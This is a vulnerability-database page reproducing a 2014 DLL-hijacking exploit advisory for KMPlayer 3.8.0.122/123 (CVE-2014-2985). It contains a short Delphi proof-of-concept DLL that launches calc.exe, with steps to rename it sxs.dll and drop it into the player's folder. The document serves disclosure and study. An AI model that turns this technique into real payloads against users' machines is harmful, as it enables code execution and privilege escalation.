Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Kmplayer 3.8.0.122 / 3.8.0.123 DLL Hijacking

Related Vulnerabilities: CVE-2014-2985  
Publish Date: 28 Apr 2014
Author: Aryan Bayaninejad
Source 
                							

                # Kmplayer  3.8.0.122 /  3.8.0.123 DLL Hijacking
#
###########################
#
# Exploit Title: [KmPlayer 3.8.0.123 DLL Hijacking ]
# Date: [2014/04/22]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: [http://www.kmplayer.com/]
# Software Link: [
http://www.softpedia.com/progDownload/KMPlayer-Download-26726.html]
# Version: [Version 3.8.0.122  and 3.8.0.123 ]
# Tested on: [Windows Xp Sp3 - 32bit & Windows 7 - 32bit & 64bit]
# CVE : [CVE-2014-2985]
#
###########################

details:

Untrusted search path vulnerability in Kmplayer latest version [3.8.0.123]
when running on Windows 7, and XP, allows local

users and possibly remote attackers to gain privileges via a Trojan horse
DLL in the current working directory by sxs.dll .

uses
Windows;
begin
Winexec(PAnsichar('C:\WINDOWS\system32\calc.exe'),sw_show);
end.

Compile Above Source Code With Delphi And Rename Compiled DLL To sxs.dll
Then Copy It To The KMPlayer Installed Path, Now If You Run The KMPlayer
DLL Will Hijacked!
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started